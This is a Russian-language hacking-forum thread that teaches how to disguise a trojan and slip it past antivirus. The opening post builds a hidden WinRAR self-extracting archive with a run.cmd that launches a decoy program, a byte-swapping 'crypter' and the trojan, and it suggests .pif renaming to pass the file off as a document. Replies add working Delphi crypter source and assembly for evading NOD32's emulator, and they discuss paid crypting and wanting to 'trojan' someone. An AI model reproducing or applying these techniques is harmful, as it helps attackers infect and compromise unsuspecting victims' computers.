И так у нас есть трой...НО он палится антивирями. Что делать? Идти покупать криптор - нет это не для нас... Писать свой трой или криптор - не все умеют, а иногда лень...
Теперь мы сделаем это подручными средствами за минуту...
Нужно: winRAR и программа crypter, написанная Talisman'ом специально для этого дела...
1. Подготавливаем внутренность архива.
Внутренности архива:
Ваши файлы + 3 следующих файла:
1. run.cmd
2. 1.exe
3. crypter.exe, найдете в конце статьи
----
1.exe - и есть ваш троянчек.
В run.cmd пишем следующее:

start yourprogramm.exe
start crypter.exe
start 1.exe
exit

, где yourprogramm.exe - ваша нормальная программа.
Что это делает?
при запуске run.cmd у нас запускается crypter.exe и все=)
Теперь рассмотрим crypter.exe:
Это всего навсего программа, которая меняет порядок байт в файле(то есть делает кашу). При первом запуске она меняет порядок файлов, при втором возвращает все на место.
-----
И так для первого шага кладем ваш exe'шный файл в какую-то папку, туда же кладем своего трояна с именем 1.exe, туда же кладем run.cmd с кодом выше^^ и туда же кладем cryptor.exe.
Теперь запускаем crypter.exe и у нас файл перепутался и антивирус теперь не палит его...

2. Делаем sfx архив:
Выделяем наши файлы и жмем добавить в архив.

Отмечаем пункт 'Создать SFX-архив'.

Переходим на вкладку дополнительно и жмем 'Параметры SFX'.

Переходим на вкладку Режимы и отмечаем пункт Скрыть все и Перезаписывать все файлы (теперь при запуске архива не будет выводиться никаких окон).


Переходим на вкладку Общие. Нас будет интересовать путь для распаковки. Можно здесь прописать путь к папке в которую будут извлекаться файлы. Все файлы будут извлекаться в одну папку. Можете написать "%windir%".


Иконку для результирующего исполняемого файла можно выбрать на вкладке Текст и Иконки , нажав на кнопку Обзор.

На вкладке Общие в поле выполнить после распаковки пишем run.cmd
---------
Дополнение:
Переименуем любой exe файл в pif.
О-ба! все работает так же=) но во-первых pif'a в винде не видно и во-вторых очень часто путают с документами Acrobat Reade'a ;)
---------
Pif с непропатченным браузером IE запускается при клике на ссылку, не нужно нажимать сохранить и так далее...
---------
Статья сделана на основе http://forum.antichat.ru/thread24979.html
Она будет постепенно обновляться, так как у меня есть еще очень много полезных идей, чтоб замаскировать троян от антивирусов.
============================
Crypter.exe:
Работает только с файлом с именем 1.exe
http://slil.ru/23344495
Написал Talisman (http://forum.antichat.ru/member.php?userid=23756)

============================
Просьба писать о всех недочетах и ошибках, найденных в статье

ReanimatoR каспер 6 палит, последние обновления, обновления за месяц! Антивирь палит ИМХО.

Ясное дело проактивная защита будет палить=)
а проскань на вирусджоти = не будет...
это еще не все=) я еще буду дописывать...
100% не палящийся способ= на этом яб не плохо заработал=)
А это инфа к размышлению и додумыванию

ReanimatoR ты б лучше криптор выложил для ламаков каких нибудь, у меня их довала, но они приватные и дать немогу(кстати я их взял бесплатно, сеть 2 месяца серфинговал)

Если выкладывать приватный криптор, то через пару дней о нем можно будет забыть, бо толку 0.

~Real F@ck!~
Угумс, я видел....
Как на dl, про тебя писали что ты ко всем в аси лез и просил криптор
Смотреть тут (http://www.damagelab.org/index.php?showtopic=12549)

ReanimatoR ненадо выкладывать криптор, я так к слову сказал, у меня их довала, а кому надо тот пусть тему или ещё что нить создаёт!

Раскрою секрет криптора-кашеварителя :)
вся его суть заключается в изменении сигнатур программы 1.exe - чтобы не палили антивири, как это проще всего сделать? менять местами байты экзешника, причем чтобы не гемороится - симметричным менять алгоритмом - запустил криптор четное число раз - ничего не изменилось, а нечетное - прога превратилась в мусор.
Вот код на Делфи:
program krip;
uses
SysUtils, Classes; // минимальный "карсет" программы
var
f:tfileStream; // переменная, в которую поместим криптуемый файл
s1,s2:byte; // перемещаемые байты
s,ss:int64; // адреса в 64 ричной системе
i:integer; // просто счетчик)
begin
f:=tfilestream.create('1.exe', fmOpenReadWrite); // грузим файл на чтение и запись
i:=222; // устанавливаем начальное значение счетчика в 222, чтобы не затереть PE - заголовок (хотя можно и затирать ) )
while i<int(f.Size) do begin // пускаем цикл до длины файла
s:=int64(i); // преобразуем счетчик в адрес типа int64
ss:=int64(i+1); //получаем адрес следующего байта
f.seek(s, soFromBeginning); // переходим в файле на s байт с начала файла
f.read(s1,sizeof(s1)); // читаем значение байта в s1
f.seek(ss, soFromBeginning); // переходим в байт ss (следующий за s)
f.read(s2,sizeof(s2)); // считываем s2
f.seek(s, soFromBeginning); // переходим на s
f.Write(s2,sizeof(s2)); // пишем s2
f.seek(ss, soFromBeginning); // переходим на ss
f.Write(s1,sizeof(s1)); // пишем s1
// т.е. мы поменяли местами 2 идущих подряд байта
i:=i+2; // увеличиваем счетчик на 2, чтобы менять байты парами, а не "лесенкой"
end; // идем в начало цикла while
f.free; // освобождаем файл
end. // завершаем работу)

Talisman +1
Ksander эт ты ачат позориш нах, я ваще в халяву попросился, меня непустили да ещё и вот это повесили, и ещё всё началось лиш из-за пинча 2.60 который с дамагелаба я выложил на античат!
Mukis несмеши людей, я за 1$ криптую а ты за 3$ ! У меня ток аваст палит и сё, если у тебя даже нечё непалит ты что то с ценой загнул!

Мда...собрались люди...
1. удалите свой флуд. Разборки в ПМ
2. это НЕ КРИПТОР! Это всего навсего штука, которая делает из файла КАШУ. И чтоб запустить файл, нужно опять запустить эту прогу=). Это можно делать любым архиватотром, который поддерживает раззиповку с паролем из командной строки(например Orien)

Хорошая статья ;)
вот тока один вопрос, у кого есть иконка фотографий в *.ico ?

Блин у меня проблема, я все делаю по инструкции, запускаю уже гатовый архив мне пишет ошибку что типа фаил не евляется програмой для вин32,
я как понимаю в run.cmd не выплолняется команда start crypter.exe
раньше все норм работало, а теперь блин... :(
может кто встречался с проблемой?
+ меня раньше в винраре где прописываеш адрес куда будет распоковывотся, можно было галку ставить абсолютный путь, а теперь как пропачтил винрар т.к. срок истек нильзя туда галку ставить :(
вобще из-за чего может быть проблема?

я вам сейчас возможно открою секрет, а возможно нет
насколько я знаю у NOD32 самый мощный эвристик/эмулятор кода
я придумал (возможно не я первый) его обходить таким способом:
записать первым байтом ExitProcess retn (0xc3), вызвать ее а потом восстановить старый байт (надо его прочитать)
выдираю код (с анти-интеллектульным мусором) из одной своей фигни (все исправлять уже очень лень)

; WriteProcessMemory at kernel32.ExitProcess
mov eax, 0x1f
mov ecx, WriteProcessMemory+0x43
mov edi, ecx
inc eax
dec eax
lea ebx, [bwrite]
nop
nop
jmp nop5
dd 0x90909090
dd 0x90909090
dd 0x90909090
dd 0x90909090
nop5:
push ebx
push 3
lea ebx, [cmd_retn]
push ebx
mov ebx, ExitProcess-2
inc ebx
sub ebx, -1
nop
nop
mov ecx, [ebx]
xchg ebx, ecx
sub eax, 2
nop
nop
aad
xor [cmd_retn], 0x55
jmp nop6
dd 0x90909090
dd 0x90909090
dd 0x90909090
dd 0x90909090
nop6:
sub ebx, eax
push ebx
add dword [esp], 0x1f
dec dword [esp]
mov esi, edi
dec dword [esp]
push 1
dec dword [esp]
sub dword [esp], 1
mov ecx, esi
jmp nop7
dd 0x90909090
dd 0x90909090
dd 0x90909090
dd 0x90909090
nop7:
call dword [ecx-0x43]
nop
nop
; jmp ml

; goodbye, NOD32 heu
finvoke ExitProcess, 0


когда я это все делал, работало отлично. NOD видел завершение обычное процесса
и весь код дальше его эмулятор не выполнял. далее можно расшифровывать любым алгоритмом остальной код и запускать его. На SEH нод не реагирует.

Из этого помоему уже можно что-нибудь придумать.

Добавьте некоторые старые антиотладочные приёмы, сделайте навесной расшифровщик постраничный
и у вас получится офигенный криптор.

хэк?

не, лучше уж я постаринке, хороший криптор + хороший джойнер))

Тоже пробовал криптовать Sfx архивом, но чёт не помогало, а это прокатило =)

Если выкладывать приватный криптор, то через пару дней о нем можно будет забыть, бо толку 0.

полне согласен , НО товарисч помог тем которые ищут то что не могут сами зделать или написать , то есть комуто + и не тока кому то , а и от кавота если не забудут тож , я думаю не сложно 1 рах написать для кавота то есть для чайника что и как и почему , если он не дурак возможность использует ну а если дурак то увы , етот + в сторону каспера итп......

Объясните пожалуйсто ну уже блин! почему у меня такая проблема?
Проблема описана тут (http://forum.antichat.ru/showpost.php?p=277158&postcount=15)

Добавьте некоторые старые антиотладочные приёмы, сделайте навесной расшифровщик постраничный
и у вас получится офигенный криптор.

раскажы плз как мона ето все примерн написать

Объясните пожалуйсто ну уже блин! почему у меня такая проблема?
Проблема описана тут (http://forum.antichat.ru/showpost.php?p=277158&postcount=15)
фиговый архивер, с урезанным функционалом.

Всем привет у меня проблемма. При запуске файла, вирус не успевает вовремя перекодироваться и из-за этого ничего не работает. Теперь вопрос: Как поставить задержку на .cmd? Cпасибо.

http://img183.imageshack.us/img183/1948/tkje5.png

Как поставить задержку на .cmd? Cпасибо.

http://www.old.antichat.ru/txt/old/dhgroup/bat.shtml

Надо что-бы не спрашивал... А про pause я знал... Но надо чтоб автоматом возобновлял работу.


Edit: Всё, разобрался. Тупой путь, но работает.

Как то да проблему 1337z0r решил,
я ему ЛС отписал до него даже не дошло оно, (всмысле не открывал до сих пор)
подскажите пожалуйсто почему такое вдруг произошло? было кстати все норм в начале

пробовал команду
ping -n 1 localhost > nul
но пишет что процесс ни может получить доступ к файлу т.к. этот фаил занет другим процессом
посоветуйте что-нибудь, срочно нужно затроянить человека!

Криптор работает толька з 1.ехе.! ! !Л О Ж! ! !.Открываем Блокнотом криптор.Ищем там 1.ехе и ставим заменить на "youprog" Где youprog - трой
--------------------------------
Ето кому --нефигделать--:)

У меня во время распаковки аваст палит вирус, блочит его, криптор не находит этот вирус и виснет.

Ссылка битая ! Перезалейте кто нить!

Пользуюсь халявным криптором MushrooM CryptoR 1.0
Ароде нормальный !!
Но смотря для каких целей Тем кто жестоко распространяет
Зависит от принципа впаривания автоматическая связка то насрать а если так какйонить фейк или ещё чтонибуть то Ручками прячте